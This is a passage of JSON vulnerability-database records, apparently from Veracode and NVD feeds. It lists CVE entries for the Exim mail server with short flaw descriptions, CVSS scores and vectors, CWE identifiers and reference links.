"NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28025"], "modified": "2021-05-10T18:47:31", "id": "VERACODE:30346", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-30346/summary", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-07-26T13:49:16", "description": "exim4 is vulnerable to privilege escalation. The vulnerability exists due to an integer overflow in get_stdinput(). \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-04T22:32:48", "type": "veracode", "title": "Privilege Escalation", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28009"], "modified": "2021-05-10T20:47:37", "id": "VERACODE:30332", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-30332/summary", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-26T13:49:10", "description": "exim4 is vulnerable to privilege escalation. An attacker with the privileges of the exim user can create a symlink/hardlink in the log directory and append arbitrary contents to an arbitrary file such as `/etc/passwd` to obtain full root privileges.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-04T22:32:51", "type": "veracode", "title": "Privilege Escalation", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28007"], "modified": "2021-05-10T22:47:37", "id": "VERACODE:30333", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-30333/summary", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-26T16:34:20", "description": "exim4:buster is vulnerable to denial of service. The vulnerability exists because of failure to reset function pointer after BDAT error\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-05-04T22:33:24", "type": "veracode", "title": "Denial Of Service (DoS)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28019"], "modified": "2021-05-10T18:47:34", "id": "VERACODE:30334", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-30334/summary", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-07-26T13:28:57", "description": "exim4 is vulnerable to arbitrary code execution . Line truncation and injection in `spool_read_header()` could potentially allow an attacker to execute arbitrary code on the host OS.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-04T22:34:02", "type": "veracode", "title": "Arbitrary Code Execution", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28026"], "modified": "2022-07-13T12:56:24", "id": "VERACODE:30342", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-30342/summary", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-26T13:30:19", "description": "exim4 is vulnerable to privilege escalation. The vulnerability exists due to insufficient validation of user-supplied input when processing new line characters. A remote attacker can inject a new line character into the spool header file and modify the mail queue.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-04T22:34:22", "type": "veracode", "title": "Privilege Escalation", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28021"], "modified": "2021-05-10T18:47:33", "id": "VERACODE:30347", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-30347/summary", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-07-26T16:28:35", "description": "exim is vulnerable to privilege escalation. The vulnerability exists due to a race condition which a user may delete arbitrary files. \n", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 6.3, "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2021-05-06T13:58:52", "type": "veracode", "title": "Privilege Escalation", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.3, "vectorString": "AV:L/AC:M/Au:N/C:N/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27216"], "modified": "2021-05-14T00:10:00", "id": "VERACODE:30373", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-30373/summary", "cvss": {"score": 6.3, "vector": "AV:L/AC:M/Au:N/C:N/I:C/A:C"}}], "cve": [{"lastseen": "2023-06-06T14:43:50", "description": "Exim 4 before 4.94.2 has Improper Initialization that can lead to recursion-based stack consumption or other consequences. This occurs because use of certain getc functions is mishandled when a client uses BDAT instead of DATA.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-05-06T13:15:00", "type": "cve", "title": "CVE-2020-28019", "cwe": ["CWE-665"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28019"], "modified": "2021-05-10T17:01:00", "cpe": [], "id": "CVE-2020-28019", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-28019", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": []}, {"lastseen": "2023-06-06T14:43:52", "description": "Exim 4 before 4.92 allows Integer Overflow to Buffer Overflow, in which an unauthenticated remote attacker can execute arbitrary code by leveraging the mishandling of continuation lines during header-length restriction.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "cve", "title": "CVE-2020-28020", "cwe": ["CWE-190"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28020"], "modified": "2022-06-28T14:11:00", "cpe": [], "id": "CVE-2020-28020", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-28020", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-06-06T14:43:50", "description": "Exim 4 before 4.94.2 allows an off-by-two Out-of-bounds Write because \"-F ''\" is mishandled by parse_fix_phrase.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "cve", "title": "CVE-2020-28016", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28016"], "modified": "2021-05-10T18:40:00", "cpe": [], "id": "CVE-2020-28016", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-28016", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2023-06-06T14:43:49", "description": "Exim 4 before 4.94.2 allows Integer Overflow to Buffer Overflow because get_stdinput allows unbounded reads that are accompanied by unbounded increases in a certain size variable. NOTE: exploitation may be impractical because of the execution time needed to overflow (multiple days).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "cve", "title": "CVE-2020-28009", "cwe": ["CWE-190"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28009"], "modified": "2021-05-10T19:49:00", "cpe": [], "id": "CVE-2020-28009", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-28009", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2023-06-06T14:43:50", "description": "Exim 4 before 4.94.2 allows Execution with Unnecessary Privileges. The -oP option is available to the exim user, and allows a denial of service because root-owned files can be overwritten.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "LOW", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 4.2}, "published": "2021-05-06T13:15:00", "type": "cve", "title": "CVE-2020-28014", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "PARTIAL", "baseScore": 5.6, "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 7.8, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28014"], "modified": "2022-07-12T17:42:00", "cpe": [], "id": "CVE-2020-28014", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-28014", "cvss": {"score": 5.6, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:C"}, "cpe23": []}, {"lastseen": "2023-06-06T14:43:52", "description": "Exim 4 before 4.94.2 has Improper Neutralization of Line Delimiters, relevant in non-default configurations that enable Delivery Status Notification (DSN). Certain uses of ORCPT= can place a newline into a spool header file, and indirectly allow unauthenticated remote attackers to execute arbitrary commands as root.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "cve", "title": "CVE-2020-28026", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28026"], "modified": "2022-07-12T17:42:00", "cpe": [], "id": "CVE-2020-28026", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-28026", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2023-06-06T14:43:51", "description": "Exim 4 before 4.94.2 allows Heap-based Buffer Overflow in queue_run via two sender options: -R and -S. This may cause privilege escalation from exim to root.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "cve", "title": "CVE-2020-28011", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28011"], "modified": "2021-05-10T19:28:00", "cpe": [], "id": "CVE-2020-28011", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-28011", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2023-06-06T14:43:53", "description": "Exim 4 before 4.94.2 allows Use After Free in smtp_reset in certain situations that may be common for builds with OpenSSL.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "cve", "title": "CVE-2020-28018", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28018"], "modified": "2021-05-26T19:34:00", "cpe": [], "id": "CVE-2020-28018", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-28018", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-06-06T14:43:50", "description": "Exim 4 before 4.94.2 allows Heap-based Buffer Overflow because it mishandles \"-F '.('\" on the command line, and thus may allow privilege escalation from any user to root. This occurs because of the interpretation of negative sizes in strncpy.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "cve", "title": "CVE-2020-28013", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28013"], "modified": "2021-05-10T18:43:00", "cpe": [], "id": "CVE-2020-28013", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-28013", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2023-06-06T14:43:52", "description": "Exim 4 before 4.94.2 allows Out-of-bounds Write because the main function, while setuid root, copies the current working directory pathname into a buffer that is too small (on some common platforms).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "cve", "title": "CVE-2020-28010", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28010"], "modified": "2021-12-03T19:59:00", "cpe": [], "id": "CVE-2020-28010", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-28010", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2023-06-06T14:43:50", "description": "Exim 4 before 4.94.2 allows Exposure of File Descriptor to Unintended Control Sphere because rda_interpret uses a privileged pipe that lacks a close-on-exec flag.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "cve", "title": "CVE-2020-28012", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28012"], "modified": "2022-07-12T17:42:00", "cpe": [], "id": "CVE-2020-28012", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-28012", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2023-06-06T14:43:48", "description": "Exim 4 before 4.94.2 allows Execution with Unnecessary Privileges. Because Exim operates as root in the spool directory (owned by a non-root user), an attacker can write to a /var/spool/exim4/input spool header file, in which a crafted recipient address can indirectly lead to command execution.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "cve", "title": "CVE-2020-28008", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28008"], "modified": "2021-05-10T20:17:00", "cpe": [], "id": "CVE-2020-28008", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-28008", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2023-06-06T14:43:52", "description": "Exim 4 before 4.94.2 allows Buffer Underwrite that may result in unauthenticated remote attackers executing arbitrary commands, because smtp_ungetc was only intended to push back characters, but can actually push back non-character error codes such as EOF.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", 